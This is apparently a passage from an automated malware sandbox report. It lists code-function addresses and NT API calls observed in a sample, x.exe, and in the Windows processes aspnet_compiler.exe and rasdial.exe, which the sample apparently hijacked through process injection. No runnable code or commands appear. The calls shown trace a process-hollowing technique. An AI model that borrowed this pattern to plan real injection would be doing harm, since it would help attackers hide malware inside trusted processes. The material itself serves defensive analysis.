            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2D30 NtUnmapViewOfSection,3_2_01AF2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2D00 NtSetInformationFile,3_2_01AF2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2D10 NtMapViewOfSection,3_2_01AF2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2CA0 NtQueryInformationToken,3_2_01AF2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2CF0 NtOpenProcess,3_2_01AF2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2CC0 NtQueryVirtualMemory,3_2_01AF2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2C00 NtQueryInformationProcess,3_2_01AF2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2C60 NtCreateKey,3_2_01AF2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2FA0 NtQuerySection,3_2_01AF2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2FB0 NtResumeThread,3_2_01AF2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2F90 NtProtectVirtualMemory,3_2_01AF2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2FE0 NtCreateFile,3_2_01AF2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2F30 NtCreateSection,3_2_01AF2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2F60 NtCreateProcessEx,3_2_01AF2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2EA0 NtAdjustPrivilegesToken,3_2_01AF2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2E80 NtReadVirtualMemory,3_2_01AF2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2EE0 NtQueueApcThread,3_2_01AF2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2E30 NtWriteVirtualMemory,3_2_01AF2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3090 NtSetValueKey,3_2_01AF3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3010 NtOpenDirectoryObject,3_2_01AF3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF39B0 NtGetContextThread,3_2_01AF39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3D10 NtOpenProcessToken,3_2_01AF3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3D70 NtOpenThread,3_2_01AF3D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B64650 NtSuspendThread,LdrInitializeThunk,6_2_04B64650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B64340 NtSetContextThread,LdrInitializeThunk,6_2_04B64340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04B62CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04B62C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62C60 NtCreateKey,LdrInitializeThunk,6_2_04B62C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04B62DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62DD0 NtDelayExecution,LdrInitializeThunk,6_2_04B62DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04B62D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04B62D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04B62E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04B62EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62FB0 NtResumeThread,LdrInitializeThunk,6_2_04B62FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62FE0 NtCreateFile,LdrInitializeThunk,6_2_04B62FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62F30 NtCreateSection,LdrInitializeThunk,6_2_04B62F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62AF0 NtWriteFile,LdrInitializeThunk,6_2_04B62AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62AD0 NtReadFile,LdrInitializeThunk,6_2_04B62AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04B62BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04B62BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04B62BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62B60 NtClose,LdrInitializeThunk,6_2_04B62B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B635C0 NtCreateMutant,LdrInitializeThunk,6_2_04B635C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B639B0 NtGetContextThread,LdrInitializeThunk,6_2_04B639B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62CF0 NtOpenProcess,6_2_04B62CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62CC0 NtQueryVirtualMemory,6_2_04B62CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62C00 NtQueryInformationProcess,6_2_04B62C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62DB0 NtEnumerateKey,6_2_04B62DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62D00 NtSetInformationFile,6_2_04B62D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62EA0 NtAdjustPrivilegesToken,6_2_04B62EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62E30 NtWriteVirtualMemory,6_2_04B62E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62FA0 NtQuerySection,6_2_04B62FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62F90 NtProtectVirtualMemory,6_2_04B62F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62F60 NtCreateProcessEx,6_2_04B62F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62AB0 NtWaitForSingleObject,6_2_04B62AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62B80 NtQueryInformationFile,6_2_04B62B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63090 NtSetValueKey,6_2_04B63090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63010 NtOpenDirectoryObject,6_2_04B63010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63D10 NtOpenProcessToken,6_2_04B63D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63D70 NtOpenThread,6_2_04B63D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68AF0 NtCreateFile,6_2_02C68AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68F50 NtAllocateVirtualMemory,6_2_02C68F50
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68C60 NtReadFile,6_2_02C68C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68DF0 NtClose,6_2_02C68DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68D50 NtDeleteFile,6_2_02C68D50
            Source: C:\Users\user\Desktop\x.exeCode function: 0_2_017E0D610_2_017E0D61
            Source: C:\Users\user\Desktop\x.exeCode function: 0_2_017E3A010_2_017E3A01
            Source: C:\Users\user\Desktop\x.exeCode function: 0_2_017E42900_2_017E4290
            Source: C:\Users\user\Desktop\x.exeCode function: 0_2_017E42D00_2_017E42D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004180933_2_00418093
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0040F8E13_2_0040F8E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0040F8E33_2_0040F8E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004030903_2_00403090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004011F03_2_004011F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0041627E3_2_0041627E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004162833_2_00416283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0040FB033_2_0040FB03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00402BE23_2_00402BE2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00402BF03_2_00402BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0040DB833_2_0040DB83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004025603_2_00402560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00401DE03_2_00401DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0042E6F33_2_0042E6F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B801AA3_2_01B801AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B741A23_2_01B741A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B781CC3_2_01B781CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB01003_2_01AB0100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A1183_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B481583_2_01B48158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B520003_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE3F03_2_01ACE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B803E63_2_01B803E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7A3523_2_01B7A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B402C03_2_01B402C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B602743_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B805913_2_01B80591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC05353_2_01AC0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6E4F63_2_01B6E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B644203_2_01B64420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B724463_2_01B72446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABC7C03_2_01ABC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC07703_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE47503_2_01AE4750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADC6E03_2_01ADC6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A03_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B8A9A63_2_01B8A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD69623_2_01AD6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA68B83_2_01AA68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE8F03_2_01AEE8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACA8403_2_01ACA840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC28403_2_01AC2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B76BD73_2_01B76BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7AB403_2_01B7AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA803_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD8DBF3_2_01AD8DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABADE03_2_01ABADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5CD1F3_2_01B5CD1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACAD003_2_01ACAD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60CB53_2_01B60CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0CF23_2_01AB0CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0C003_2_01AC0C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3EFA03_2_01B3EFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACCFE03_2_01ACCFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB2FC83_2_01AB2FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B62F303_2_01B62F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B02F283_2_01B02F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE0F303_2_01AE0F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B34F403_2_01B34F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7CE933_2_01B7CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2E903_2_01AD2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7EEDB3_2_01B7EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7EE263_2_01B7EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0E593_2_01AC0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACB1B03_2_01ACB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF516C3_2_01AF516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B8B16B3_2_01B8B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAF1723_2_01AAF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7F0E03_2_01B7F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B770E93_2_01B770E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC70C03_2_01AC70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6F0CC3_2_01B6F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B0739A3_2_01B0739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7132D3_2_01B7132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAD34C3_2_01AAD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC52A03_2_01AC52A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B612ED3_2_01B612ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADB2C03_2_01ADB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5D5B03_2_01B5D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B895C33_2_01B895C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B775713_2_01B77571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7F43F3_2_01B7F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB14603_2_01AB1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7F7B03_2_01B7F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B716CC3_2_01B716CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B056303_2_01B05630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B559103_2_01B55910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC99503_2_01AC9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADB9503_2_01ADB950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC38E03_2_01AC38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2D8003_2_01B2D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADFB803_2_01ADFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B35BF03_2_01B35BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AFDBF93_2_01AFDBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FB763_2_01B7FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B05AA03_2_01B05AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B61AA33_2_01B61AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5DAAC3_2_01B5DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6DAC63_2_01B6DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B33A6C3_2_01B33A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B77A463_2_01B77A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FA493_2_01B7FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADFDC03_2_01ADFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B77D733_2_01B77D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC3D403_2_01AC3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B71D5A3_2_01B71D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FCF23_2_01B7FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B39C323_2_01B39C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FFB13_2_01B7FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC1F923_2_01AC1F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A83FD23_2_01A83FD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A83FD53_2_01A83FD5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FF093_2_01B7FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC9EB03_2_01AC9EB0
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059A15B95_2_059A15B9
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059B7C775_2_059B7C77
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_05998E655_2_05998E65
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_05998E675_2_05998E67
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059971075_2_05997107
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059990875_2_05999087
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599F8025_2_0599F802
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599F8075_2_0599F807
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BDE4F66_2_04BDE4F6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD44206_2_04BD4420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE24466_2_04BE2446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF05916_2_04BF0591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B305356_2_04B30535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4C6E06_2_04B4C6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B2C7C06_2_04B2C7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B307706_2_04B30770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B547506_2_04B54750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BC20006_2_04BC2000
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF01AA6_2_04BF01AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE41A26_2_04BE41A2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE81CC6_2_04BE81CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCA1186_2_04BCA118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B201006_2_04B20100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BB81586_2_04BB8158
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BB02C06_2_04BB02C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD02746_2_04BD0274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3E3F06_2_04B3E3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF03E66_2_04BF03E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEA3526_2_04BEA352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD0CB56_2_04BD0CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B20CF26_2_04B20CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B30C006_2_04B30C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B48DBF6_2_04B48DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B2ADE06_2_04B2ADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCCD1F6_2_04BCCD1F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3AD006_2_04B3AD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B42E906_2_04B42E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BECE936_2_04BECE93
